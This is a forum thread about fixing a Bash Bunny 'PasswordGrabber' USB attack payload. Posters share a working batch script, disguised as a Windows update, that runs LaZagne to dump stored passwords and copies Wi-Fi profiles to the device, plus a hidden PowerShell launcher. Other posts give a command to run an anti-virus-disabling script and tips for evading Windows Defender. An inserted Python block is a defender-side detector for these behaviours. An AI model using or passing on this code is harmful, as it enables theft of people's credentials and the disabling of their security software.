Cech

PasswordGrabber by LazaGne Not Working


Hey guys, I've recently bought a Bash Bunny and I've tried to set PasswordGrabber on Switch2. I've copied all the files (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md). Once I switch it from arming mode to switch2 (attack mode) and place it into a victim's PC (test PC) on Windows 10, the green LED starts to flash within a few seconds (which probably means to remove it, right?).

Once I remove it and switch it back to arming mode on my PC, I get empty directories and empty notepad files. Can anyone please tell me if I'm doing something wrong?

Thank you in advance, guys.


Maybe a virus scanner; lazagne.exe is mostly caught by AV.


The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works for illustration. I also attached the version of it I created and which works, tested on the latest Windows 10. If the virus scanner blocked LaZagne, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration. I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd


Nice edits, I also made a few small changes myself. I edited i.vbs to call the .cmd file directly...seems to have no bugs in my testing. 

i.vbs

Set objShell = CreateObject("WScript.Shell")



strPath = Wscript.ScriptFullName


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(strPath)
strFolder = "powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced " & objFSO.GetParentFolderName(objFile) & "\e.cmd"




objShell.Run strFolder


 

and then just remove %~dp0\e.cmd from d.cmd
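
Added example, not part of the original posts and not code from the payload's authors: a defender-side triage of process-creation events for the behaviours visible in the e.cmd and i.vbs above (hidden PowerShell started by wscript.exe, `laZagne.exe all`, xcopy of the Wlansvc profile folder, the loot directory names). Field names follow Sysmon Event ID 1; the sample events, host names, the `E:` drive letter and the two-rule threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Command-line patterns taken from the e.cmd and i.vbs posted in this thread.
RULES = {
    "hidden_powershell": re.compile(r"powershell(\.exe)?\b.*-w(indowstyle)?\s+hidden", re.I),
    "lazagne_all": re.compile(r"lazagne(\.exe)?\s+all\b", re.I),
    "wlan_profile_copy": re.compile(r"xcopy\b.*\\Wlansvc\\Profiles\\Interfaces", re.I),
    "loot_path": re.compile(r"\\loot\\(USB_Exfiltration|PasswordGrabber)\\", re.I),
}

def match_event(event):
    """Return the set of rule names one process-creation event triggers."""
    hits = {name for name, rx in RULES.items() if rx.search(event.get("CommandLine", ""))}
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    # wscript.exe starting PowerShell is the launch chain used by i.vbs.
    if parent.endswith("wscript.exe") and image.endswith("powershell.exe"):
        hits.add("wscript_spawns_powershell")
    return hits

def triage(events, threshold=2):
    """Collect hits per host; report hosts with >= threshold distinct rules."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["Computer"]] |= match_event(ev)
    return {host: sorted(r) for host, r in per_host.items() if len(r) >= threshold}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not real telemetry); E: stands in for the USB volume.
SAMPLE_EVENTS = [
    {"Computer": "TESTPC", "Image": PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced E:\payloads\switch2\e.cmd"},
    {"Computer": "TESTPC", "Image": r"E:\payloads\switch2\laZagne.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"E:\payloads\switch2\laZagne.exe all -v"},
    {"Computer": "TESTPC", "Image": r"C:\Windows\System32\xcopy.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* "
                    r"E:\loot\USB_Exfiltration\TESTPC_Sat_11_25_2017_175012_34"},
    # A lone hidden PowerShell from a scheduled task stays below the threshold.
    {"Computer": "HOST2", "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

Requiring two distinct rules per host keeps a single hidden PowerShell task from alerting on its own, while the payload's launch chain plus the collection commands report together.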


Isn't there also a problem with the PasswordGrabber payload wanting the LaZagne.exe in the tools folder? But every time you re-arm the Bunny it deletes the .exe.

14 hours ago, Am3ience said:

Isn't there also a problem with the PasswordGrabber payload wanting the LaZagne.exe in the tools folder? But every time you re-arm the Bunny it deletes the .exe.

You could paste a little piece of code before that that disables the AV:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

1 hour ago, C1PH3R said:

You could paste a little piece of code before that that disables the AV:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

21 hours ago, Am3ience said:

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

Huh, that is strange.

On 2018-02-22 at 11:35 AM, RazerBlade said:

Windows defender removes it.

 

Yea, Windows Defender needs to be turned off. I just started playing around with this; maybe I can find something to auto-turn it off, if that's even possible.

12 hours ago, Spoonman said:

 

Yea, Windows Defender needs to be turned off. I just started playing around with this; maybe I can find something to auto-turn it off, if that's even possible.

A better way would be to compile the code yourself and add a couple of comments to change the file signature.


I have been playing with Python for hours trying to figure out how to compile this. It can't be that complicated. I got 2.7, used pip to install all the dependencies and tried cx_freeze and I get errors. Is there an earlier version of Python or somewhere that gives compile instructions?


I've modified this payload for disabling Windows Defender (only) and activating again after finishing.

https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

2 hours ago, DennisVeninga said:

I've modified this payload for disabling Windows Defender (only) and activating again after finishing.

https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

I have done what you say and it doesn't work for me. Why? I am new at this, help.

On 11/25/2017 at 5:50 PM, Struthian said:

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works for illustration. I also attached the version of it I created and which works, tested on the latest Windows 10. If the virus scanner blocked LaZagne, then the directory would be created. Notice the formatting of drec, then the use of dst instead of drec. Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration. I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Hello, you have function USB_Exfiltration and PasswordGrabber? Could you share the files please?


 
